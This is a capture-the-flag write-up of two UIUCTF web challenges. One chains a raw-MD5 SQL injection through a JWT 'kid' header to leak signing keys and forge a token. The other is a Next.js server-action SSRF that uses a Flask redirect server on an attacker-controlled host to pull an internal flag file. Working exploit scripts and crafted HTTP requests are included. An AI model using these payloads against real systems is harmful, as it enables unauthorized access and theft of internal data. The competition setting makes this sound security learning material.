UIUCTF is an annual capture-the-flag competition hosted by SIGPwny, the cybersecurity club at the University of Illinois Urbana-Champaign (UIUC).
Web Exploitation
Fare Evasion
SIGPwny Transit Authority needs your fares, but the system is acting a tad odd. We’ll let you sign your tickets this time!
We are prompted with a minimal website with only two buttons: “I’m a Passenger” and “I’m a Conductor”. The Conductor button is disabled. When clicking the Passenger button, a POST request is made to the /pay
endpoint and the only thing sent along with the request is the access_token
cookie. The access token looks like eyJhbGciOiJIUzI1NiIsImtpZCI6InBhc3Nlbmdlcl9rZXkiLCJ0eXAiOiJKV1QifQ.eyJ0eXBlIjoicGFzc2VuZ2VyIn0.EqwTzKXS85U_CbNznSxBz8qA1mDZOs1JomTXSbsw0Zs
which is a JWT.
Additionally, there is also a brief popup on the website (which is just the raw text of the POST /pay
Hmm, is this actually the JWT signing key? We can validate using https://jwt.io/ and it turns out it is! From here, I was feeling pretty confident and assumed we could just change kid
→ conductor_key
and type
→ conductor
, and forge our own JWT. However, doing this gave me a new error: “Key isn’t passenger or conductor. Please sign your own tickets”. I started testing around with some common JWT vulnerabilities such as alg=None
but was getting the same issues. Based on my testing, I started to decipher the error messages:
- Key isn’t passenger or conductor. Please sign your own tickets
- The JWT verification failed(?)
- Key isn’t passenger or conductor. Please sign your own tickets (with hash)
- The JWT verification failed(?) but
is valid
- The JWT verification failed(?) but
- Sorry passenger, only conductors are allowed right now. Please sign your own tickets.
- Get this when
is not valid (?)
- Get this when
- Sorry passenger, only conductors are allowed right now (with hash)
- Get this when
was able to be successfully looked up (?)
- Get this when
- Indecipherable kid
- If the JWT cannot be parsed properly, ie malformed JWT
We can learn more about the “kid” (key ID) header here https://www.rfc-editor.org/rfc/rfc7515#section-4.1.4. It’s a way to specify what key is to be used for validation. So, I formed a pseudo workflow for the backend:
- Get
POST /pay
request - Extract the header from the JWT (specifically,
) - Grab the specific key for that kid
- Verify signature using said key
So we know one of the keys: passenger_key
and we know from our initial testing that the conductor key is not as simple as conductor_key
. Taking a look at the client-side source:
Now we know that the key is being extracted from a SQLite database. We first take the MD5 hash of the kid and then use that as the lookup. So, for passenger_key
SELECT * FROM keys WHERE kid = '5f0852f21e73dc78c9c402c5b4125ce4`;
At least, that would be the intuitive thought. The part that stood out to our team from the very beginning was the weird encoding in the HTML popup when you click the button— just raw bytes. And now, in the comments, we see the “TODO: convert md5 to hex instead of latin1”. It looks like we need to perform some sort of SQL injection. A quick Google search of “MD5 SQL injection” yields a CTF writeup by Christian von Kleist (https://cvk.posthaven.com/sql-injection-with-raw-md5-hashes) discussing how using the raw bytes of MD5 rather than the hexdigest can provide opportunity for SQL injection. I won’t go into details on the technicals because the blog post does a great job on it, but basically, we can use the string 129581926211651571912466741651878684928
which when hashed using MD5:
hexdigest: 06da5430449f8f6f23dfc1276f722738
raw: ?T0D??o#??'or'8.N=?
Armed with this information, I created a quick script to automate the signing of the JWT and making the POST request:
key = 'a_boring_passenger_signing_key_?'
headers = {
"kid": "129581926211651571912466741651878684928"
payload = {
"type": "passenger",
jwt_token = jwt.encode(payload, key, headers=headers, algorithm='HS256')
url = 'https://fare-evasion.chal.uiuc.tf/pay'
cookies = {
'access_token': jwt_token
s = requests.Session()
r = s.post(url, cookies=cookies)
"message": "Sorry passenger, only conductors are allowed right now. Please sign your own tickets. \nhashed ô÷uÞIB\u0005BçÙ+ secret: conductor_key_873affdf8cc36a592ec790fc62973d55f4bf43b321bf1ccc0514063370356d5cddb4363b4786fd072d36a25e0ab60a78b8df01bd396c7a05cccbbb3733ae3f8e\nhashed _\bRò\u001esÜxÉÄ\u0002Å´\u0012\\ä secret: a_boring_passenger_signing_key_?",
"success": false
Look at that! We have now have the conductor’s key (conductor_key_873affdf8cc36a592ec790fc62973d55f4bf43b321bf1ccc0514063370356d5cddb4363b4786fd072d36a25e0ab60a78b8df01bd396c7a05cccbbb3733ae3f8e
). All we need to do now is craft one more JWT and sign it using our newly obtained conductor key :)
key = 'conductor_key_873affdf8cc36a592ec790fc62973d55f4bf43b321bf1ccc0514063370356d5cddb4363b4786fd072d36a25e0ab60a78b8df01bd396c7a05cccbbb3733ae3f8e'
headers = {
"kid": "129581926211651571912466741651878684928"
payload = {
"type": "conductor",
jwt_token = jwt.encode(payload, key, headers=headers, algorithm='HS256')
s = requests.Session()
r = s.post(url, cookies={'access_token': jwt_token})
And we get the flag!
Log Action
I keep trying to log in, but it’s not working :’(
For this challenge, we are given a super minimal NextJS app with only four routes:
- Home
- Login
- Logout
- Admin
Taking a look at the authentication flow:
export const { auth, signIn, signOut } = NextAuth({
providers: [
async authorize(credentials) {
const parsedCredentials = z
.object({ username: z.string(), password: z.string() })
if (parsedCredentials.success) {
const { username, password } = parsedCredentials.data;
// Using a one-time password is more secure
if (username === "admin" && password === randomBytes(16).toString("hex")) {
return {
username: "admin",
} as User;
throw new CredentialsSignin;
We know the username will be admin
but the password is randomly generated each login attempt— so we definitely will not be able to actually login. Taking another look at the source code, there are two webservers running: frontend (NextJS) and backend (Nginx). The flag is actually only ever referenced in the Dockerfile
where it is copied to the backend’s /usr/share/nginx/html/flag.txt
and is never included in the NextJS frontend. That information is super telling because even if we did login as admin, the flag would never be shown on the /admin
I started testing around with the webapp and noticed that the /admin
route if unauthenticated would have a callbackURL: callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fadmin
. Additionally, /logout
, did something similar. Seeing how the callback was localhost
and not the actual domain it was being served on, I started to consider server-side request forgery (SSRF) that would allow us to make a request to http://backend/flag.txt. I found this writeup https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps by Assetnote that discloses a vulnerability in NextJS versions <14.1.1. Hmm, I wonder what NextJS version we are running? We have the package.json
, so let’s take a look:
"dependencies": {
"bcrypt": "^5.1.1",
"next": "14.1.0",
"next-auth": "^5.0.0-beta.19",
"react": "^18.3.1",
"react-dom": "^18.3.1",
"zod": "^3.23.8"
NextJS 14.1.0.. So the version is vulnerable, but there are some constraints required for the webapp to be vulnerable. Specifically, the SSRF abuses NextJS server actions (Hint: Challenge name is Log Action). Let’s compare example vulnerable code and our code:
"use server";
import { redirect } from "next/navigation";
export const handleSearch = async (data: FormData) => {
if (!userIsLoggedIn()) {
// .. do other stuff ..
function userIsLoggedIn() {
return false;
import Link from "next/link";
import { redirect } from "next/navigation";
import { signOut } from "@/auth";
export default function Page() {
return (
<h1 className="text-2xl font-bold">Log out</h1>
<p>Are you sure you want to log out?</p>
<Link href="/admin">
Go back
action={async () => {
"use server";
await signOut({ redirect: false });
<button type="submit">Log out</button>
It looks vulnerable to me! It’s using server actions and calls redirect()
with a relative path. To test, I crafted a request with Burpsuite:
POST /logout HTTP/1.1
Host: jijjoji.requestcatcher.com
Content-Length: 4
Next-Action: c3a144622dd5b5046f1ccb6007fea3f3710057de
Connection: close
And caught the request! So we have now confirmed the vulnerability, let’s exploit it. I used the PoC script from Assetnote:
from flask import Flask, Response, request, redirect
app = Flask(__name__)
@app.route('/', defaults={'path': ''})
def catch(path):
if request.method == 'HEAD':
resp = Response("")
resp.headers['Content-Type'] = 'text/x-component'
return resp
return redirect('http://backend/flag.txt')
What this does is catch any request and if it is HEAD, it responds with the text/x-component Content-Type, which NextJS is expecting. Then, any other request is simply redirected to the Nginx backend to try and grab the flag. If you’re interested in the technical details of the exploit, I highly recommend reading the disclosure by Assetnote, but basically, we can abuse the Host
header to make the server action request any arbitrary host. It first starts with a HEAD
and expects text/x-component
, and then if that succeeds, it makes a GET
request to the same URL and responds with the content of that GET
request. All I need to do now is expose a port to the internet (I just used PrivateInternetAccess VPN with port forwarding) and start the Flask application on that port:
`flask run --port=35162 --host=`
Lastly, just one modified request via Burpsuite :)
POST /logout HTTP/1.1
Host: <VPN-IP>:35162
Content-Length: 4
Next-Action: c3a144622dd5b5046f1ccb6007fea3f3710057de
Connection: close
And the response to that request contains the contents of /usr/share/nginx/html/flag.txt
being served on http://backend/flag.txt